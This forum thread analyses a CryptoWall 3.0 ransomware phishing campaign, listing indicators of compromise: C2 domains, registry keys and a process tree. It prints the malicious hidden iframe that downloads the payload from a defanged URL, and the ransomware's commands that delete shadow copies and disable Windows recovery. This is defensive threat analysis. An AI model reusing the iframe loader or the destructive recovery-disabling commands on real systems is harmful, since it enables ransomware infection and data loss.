Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CryptoWall 3.0 - New, Interesting Phishing Campaign In-the-Wild


  • Please log in to reply
2 replies to this topic

#1 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:10:44 AM

Posted 05 June 2015 - 12:30 AM

MY PRIMARY ARTICLE ON MY OWN SELF-OWNED SITE https://www.emergingthreats.info/v3/article.php?id=4

 

Just a reminder to all -- CryptoWall 3.0 is still very much active, with phish tactics that I think are less effective, but who knows; maybe they're seeing great success with this method.  Personally, if successful compromise requires additional steps/execution of more than one file that's distributed as an e-mail attachment, I would imagine that the success rate would decline.  But who knows; perhaps the opening of the attached, compressed HTML file resulting in no nefarious activity initially is being used as a method of gaining trust of the targeted user...

 


CryptoWall 3.0 Still Actively Being Spread as a New Campaign is Discovered in-the-wild

 
The New Campaign Relies on Phishing
 
A new campaign spreading CryptoWall 3.0 has been observed in-the-wild, and reported to the administrator of http://malware-traffic-analysis.net who shared several screenshots as well as network traffic logs captured upon execution of the malicious binary.
 
This campaign is a bit different than others, as it involves two (2) stages of user intervention; the user must execute the initial file attached to the e-mail within a ZIP archive, but then must execute the additional file--a binary file masked as a SCR to appear to be a legitimate Adobe Reader PDF document--which contains the CryptoWall 3.0 payload.
 
The phishing e-mails are being sent claiming  to contain resumes.  An example phish shared on malware-traffic-analysis is below:
 

2015-06-04-CryptoWall-3.0-malspam-image-

 
The e-mails appear to be sourced from Yahoo e-mail addresses; a large quantity of these phishing e-mails were logged by the reporting user as being sourced from different Yahoo addresses.  Headers observed within one of the e-mails reveal a sender e-mail address of:
 

jamisonpearlberg@yahoo.com
 
With a source IP address (X-Originating-IP) of 98.1136.216.211.  The attachment, in this case, was named:
 

my_resume.zip
 
Containing a single HTML file named resume3606.html.  The HTML file is quite small, as its sole intention can be described best by the below screenshot of its source code:
 

25kjwgw.jpg

 
The HTML file contains an iframe that calls to what appears to be a compromised domain, now used as a C2 (command-and-control) server by the malware author.  The below URL called by the iframe has been filtered for user safety; this was still distributing the SCR file a few hours ago.
 

<iframe src="hxxp://coppolarestaurant.com/cgi/resume2.php?id=661" width="418" height="792" style="position:absolute;left:-10450px;"></iframe>
 
Upon opening the HTML document, this iframe opens the above URL which then prompts the download of a SCR file containing the CryptoWall 3.0 payload, masked to appear to the victim as a legitimate Adobe PDF document.
 
The attacker has modified the PE header of the file so that the SCR file's icon is that of an Adobe Reader PDF document:
 

eq9ljk.jpg

 
The sample SCR file examined from the above URL was named my_resume_pdf_id_6721-3921-5311.scr
 
Upon execution, this file launches the CryptoWall 3.0 payload that we all know and despise.
 
We have already seen CryptoWall 3.0 and analyzed it plenty of times, but this was one of the few times I actually got the sample to run cleanly in a sandbox, so I added some analysis results below, primarily to share new(er) C2 servers, new gateways (if any) utilized, etc.
 
Brief Analysis
 
Static Analysis
 
File Size: 272 KB (278,528 Bytes)
File Type: PE32 Executable (GUI)
Detection Ratio as of 06/04/2015: 4/57
Currently Detected by (as of 06/04/2015):
ESET-NOD32
Kaspersky
McAfee-GW-Edition
Qihoo-360
 
Dynamic Analysis
 
DNS Requests

ip-addr.es -> 188.165.164.184 // To get victim's external IP
pinoyjokes.org -> 174.37.160.8 // compromised site, C2 server
gdsprint.com -> 194.28.86.134 // compromised site, C2 server
 
HTTP Requests
 
Performs various POST requests; one to ip-addr.es to obtain the victim's external, public-facing IP address, and others to various C2 servers.  The structure of these POST requests are the same or very similar (i.e. different one-letter variable in request), but to different C2 servers:
 
Example request:
 

http://<c2-server-domain>/img3.php?b=puo8cmg8gx51t9
 
Example response to above:
 

x=d208506460e4fc1b86f4c88cea33d68c3a4578b5eecc0db1a8c4f68c1c8446ab3d5ff799d7aa01efc6091dfabea00392eacdd9b8e5c01157828c1c67c4efd0
 
Example request:
 

http://<c2-server-domain>/img3.php?o=7jxdqunpkp
 
Etcetera...  
 
C2 Servers

coppolarestaurant.com -> 64.136.20.51
pinoyjokes.com -> 23.23.174.132
gdsprint.com -> 194.28.86.134
herp.net -> 173.254.28.111
canbroc-bg.com -> 91.215.216.13
japaneselink.net -> 157.112.152.48
 
Payment Gateways
 
Sample Subdomain: 7oqnsnzwwnm6zb7q
 

<subdomain>.optionpaymentprak.com/k1t7k6
<subdomain>.paygateawayoros.com/k1t7k6
<subdomain>.paymentgateposa.com/k1t7k6
<subdomain>.watchdogpayment.com/k1t7k6
 
Associated Files

%LocalAppData%\<sample_name>
C:\myapp.exe
 
Injects code into explorer.exe.
 
Associated Registry Entries

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf (logged four times)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 687ddeba (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *87ddeba (logged four times)
 
Creates Start Menu Entry (Example)

C:\Users\<profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe
 
Creates Files Inside User Directory (Example)

C:\Users\<profile>\AppData\Roaming\a3a659b7.exe
 
Mutexes

CryptoWall3 // * note this was the name I saved and analyzed sample as
qazwsxedc
 
Associated Domains Used for Obtaining External, Public-Facing IP Address
 

curlmyip.com
ip-addr.es
myexternalip.com/raw
 
Spawned Processes; Process Tree
 

C:\sample.exe
  C:\sample.exe
    C:\Windows\explorer.exe
      C:\Windows\System32\svchost.exe -k netsvcs
      C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
 
Virtual Machine / Analysis Evasion
- Queries a list of all running processes
- Checks the available/free space of all local hard drives
 
Searches for the following files within the local file system (assumed; these strings were found in memory):

VBoxService.exe
vmtoolsd.exe
 
Treat this as a CryptoWall 3.0 refresher, and remember; keep your system updated, and don't open e-mails, especially not e-mail attachments, from unknown senders.  Even if the e-mail appears to be from someone you know--even if the e-mail address displayed as the sender is that of someone you know--if something looks suspicious, it's always best to trust your intuition.  Better safe than sorry.  Stay safe!
 

Edited by White Hat Mike, 05 June 2015 - 02:02 AM.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,140 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:10:44 AM

Posted 05 June 2015 - 06:09 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 White Hat Mike

White Hat Mike
  • Topic Starter

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:10:44 AM

Posted 05 June 2015 - 08:51 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.

 

Of course.  It's unfortunate that this campaign, that requires users to download and execute two separate files, appears to be quite successful...


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users